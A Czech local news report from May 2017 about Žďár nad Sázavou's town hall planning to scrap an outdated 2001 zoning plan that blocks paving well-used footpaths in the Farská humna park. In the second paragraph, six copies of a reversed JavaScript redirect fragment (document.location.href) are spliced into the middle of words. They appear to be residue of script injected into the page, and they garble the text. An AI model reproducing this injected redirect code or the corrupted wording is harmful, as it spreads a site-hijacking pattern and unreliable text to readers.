Rainbow page separator

Regulační plán ve Farských humnech ztěžuje vznik nových cest

Pondělí, 22. května 2017

Žďár nad Sázavou / Regulační plán dostavby platící dosud ve Farských humnech a Veselské ulici chce zrušit žďárská radnice. Plán byl schválen v roce 2001 a vzhledem k dnešnímu stavu lokality je již zastaralý. Zejména však komplikuje další úpravy v parku Farská humna, například při vzniku nových cest. „Než abychom dělali nesmyslně vedené cestičky a lidé si pak vyšlapali svoje v místech, kudy doopravdy chodí, je lepší regulační plán zrušit,“ poznamenal starosta Žďáru nad Sázavou Zdeněk Navrátil.

Základní přeměna Farských humen v park byla s pomocí dotace provedena v roce 2009. Nebyly však dokončeny všechny cesty a  lidmi později vyšlapané pěšinky v nejvytíženějších místech parku byly v rozporu s regulačním plánem, takže je nebylo možné jednoduše nechat vyasfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat jako chodník. Chodci se dosud musí v nejfrekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanější části parku spokojit s provizorní cestičkou, kterou radnice v minulých letech nechala zpevnit be[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonovými kvádry, aby lidé při deštích nechodili v blátě.